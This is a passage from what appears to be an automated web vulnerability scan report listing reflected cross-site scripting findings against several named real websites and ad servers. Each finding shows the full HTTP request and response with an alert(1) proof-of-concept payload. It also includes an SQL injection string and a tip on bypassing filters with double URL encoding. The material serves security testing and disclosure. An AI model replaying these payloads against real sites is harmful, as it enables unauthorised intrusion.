Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso+zUvs)2CF+[(.(>y<]pD>][8NX.G>S>V7j*s_)x:*q=s36MWy?D-?d]@6n3)XNf!R#M(IK'+%WGSupCXe=?5wnabP%erqPAShL[Uy0[f]+>:LCj1ySu%)*-+(fM0+(qUzu:>+s*?ID=v0CO9q79tdlePQ[@TNKu[vnkf?@DNFXWGQNZq=1iuS3DC; path=/; expires=Sun, 24-Jul-2011 14:24:28 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:24:28 GMT
Content-Length: 1529

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
r0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAAfyWMQQAAAAA./cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.4615b'-alert(1)-'2e372cc3b5e/referrer=http%3A%2F%2Fgames.webalta.ru%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2Nh
...[SNIP]...

5.23. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kronos.tt.omtrdc.net
Path:   /m2/kronos/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 48696<script>alert(1)</script>25fc46847c1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 216
Date: Mon, 25 Apr 2011 13:56:09 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail48696<script>alert(1)</script>25fc46847c1',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303738433760-48782.17");

5.24. http://kroogy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 was submitted in the REST URL parameter 1. This input was echoed as 286d0<img src=a onerror=alert(1)>5a8dc7282d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico286d0<img%20src%3da%20onerror%3dalert(1)>5a8dc7282d8 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6; __utmc=221607367; __utmb=221607367.1.10.1303738749

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.ico286d0<img src=a onerror=alert(1)>5a8dc7282d8Controller</strong>
...[SNIP]...

5.25. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter is copied into an HTML comment. The payload 41f63--><script>alert(1)</script>cd0802b0b7c was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shavlik/index.cfm?m=521&pg=372&h=041f63--><script>alert(1)</script>cd0802b0b7c&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 041f63--><script>alert(1)</script>cd0802b0b7c|372 -- -->
...[SNIP]...

5.26. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709 was submitted in the m parameter. This input was echoed as 29f68<img src=a onerror=alert(1)>8c4ff1d7709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68<img%20src%3da%20onerror%3dalert(1)>8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '29f68<img src=a onerror=alert(1)>8c4ff1d7709 AND DMMESSAGE.userCompanyID = 21
' at line 7
</font>
...[SNIP]...

5.27. http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7a431<script>alert(1)</script>ce4081a25f0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742451474-635361&mboxCount=1&mbox=overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 146
Date: Mon, 25 Apr 2011 15:18:18 GMT
Server: Test & Target

mboxFactoryDefault.get('overall_conversion_tracking-mbox7a431<script>alert(1)</script>ce4081a25f0',0).setOffer(new mboxOfferDefault()).activate();

5.28. http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox9e.offermatica.com
Path:   /m2/eset/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 221f6<script>alert(1)</script>458371fa13e was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con221f6<script>alert(1)</script>458371fa13e&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 209
Date: Mon, 25 Apr 2011 13:00:35 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con221f6<script>alert(1)</script>458371fa13e',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

5.29. http://ok.mail.ru/cookie-token.do [client_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ok.mail.ru
Path:   /cookie-token.do

Issue detail

The value of the client_id request parameter is copied into the HTML document as plain text between tags. The payload fa439<script>alert(1)</script>b93be018b2a was submitted in the client_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552fa439<script>alert(1)</script>b93be018b2a&remove=true HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=CBEE3BB859A85F56E2B5BB4ED4C1D0AC; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 243
Date: Mon, 25 Apr 2011 14:35:03 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [long]; nested exception is java.lang.NumberFormatException: For input string: "247552fa439<script>alert(1)</script>b93be018b2a"
</body>
...[SNIP]...

5.30. http://ok.mail.ru/cookie-token.do [remove parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ok.mail.ru
Path:   /cookie-token.do

Issue detail

The value of the remove request parameter is copied into the HTML document as plain text between tags. The payload 39088<script>alert(1)</script>7c14da063e7 was submitted in the remove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cookie-token.do?client_id=247552&remove=true39088<script>alert(1)</script>7c14da063e7 HTTP/1.1
Host: ok.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=A90368686F081A1B6C976FE1037576C9; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 251
Date: Mon, 25 Apr 2011 14:35:13 GMT
Connection: close

<html>

<head>
</head>
<body>
Failed to convert value of type [java.lang.String] to required type [boolean]; nested exception is java.lang.IllegalArgumentException: Invalid boolean value [true39088<script>alert(1)</script>7c14da063e7]
</body>
...[SNIP]...

5.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload d41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6 was submitted in the name parameter. This input was echoed as d41e8<x style=x:expression(alert(1))>15991bc29e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landingd41e8<x%20style%3dx%3aexpression(alert(1))>15991bc29e6&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1303744450_1660:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: uid=1_1303744450_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: kwd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: sit=1_1303744450_2451:52878:47778_3236:210841:210723_782:565127:564778; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: cre=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: bpd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: apd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: scg=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: ppd=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Set-Cookie: afl=1_1303744450; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landingd41e8<x style=x:expression(alert(1))>15991bc29e6' *not* found -->

5.32. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload ac54b<script>alert(1)</script>be10ff58fe0 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=480&height=360ac54b<script>alert(1)</script>be10ff58fe0&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:19 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:19 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21626
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_JmFVc7buonLLfA; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:19 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="480" height="360ac54b<script>alert(1)</script>be10ff58fe0" background-color="black" />
...[SNIP]...

5.33. http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /dynamic_preroll_playlist.fmil

Issue detail

The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 8df88<script>alert(1)</script>a5595a30893 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic_preroll_playlist.fmil?domain=133BeuXuCot&width=4808df88<script>alert(1)</script>a5595a30893&height=360&imu=medrect&sdk_ver=1.8.1.2&embedAutoDetect=false&sdk_url=http%3A%2F%2Fxs%2Emochiads%2Ecom%2Fstatic%2Fglobal%2Flib%2F HTTP/1.1
Host: pl.yumenetworks.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:54:09 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: yumerm=0rO0ABXcMAAAAAQAAAJkAAAAA; Domain=.yumenetworks.com; Expires=Sat, 29-Feb-2020 07:59:59 GMT; Path=/
YmRmHdr: @RM153_1_232
Set-Cookie: ymdt=0rO0ABXcSAAAEugAAA34AAQAAAOi7eGFI; Domain=.yumenetworks.com; Expires=Sat, 04-Jun-2011 14:54:09 GMT; Path=/
YmDtHdr: @DT_GU
Ypp: @YP_1_1;46718_21628
Set-Cookie: ymf=null; Domain=.yumenetworks.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ymvw=173_193_214_243_0ZcJJ0MjgsoTEf; Domain=.yumenetworks.com; Expires=Wed, 03-Aug-2011 14:54:09 GMT; Path=/
Content-Type: application/smil
Content-Length: 3140
P3P: policyref="http://ads.yumenetworks.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Connection: close

<smil xmlns:yume="http://www.yumenetworks.com/resources/smilextensions" yume:refresh_time="0" yume:stagger_time="0" >
<head>
<layout>
<root-layout id="main" width="4808df88<script>alert(1)</script>a5595a30893" height="360" background-color="black" />
...[SNIP]...

5.34. http://shopping.netsuite.com/s.nl [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44891'style%3d'x%3aexpression(alert(1))'9a7dd871708 was submitted in the alias parameter. This input was echoed as 44891'style='x:expression(alert(1))'9a7dd871708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=44891'style%3d'x%3aexpression(alert(1))'9a7dd871708&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:15:54 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233571352:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55003


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/44891'style='x:expression(alert(1))'9a7dd871708?whence=&c=438708&n=1'>
...[SNIP]...

5.35. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6483e'style='x:expression(alert(1))'be136aaa48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

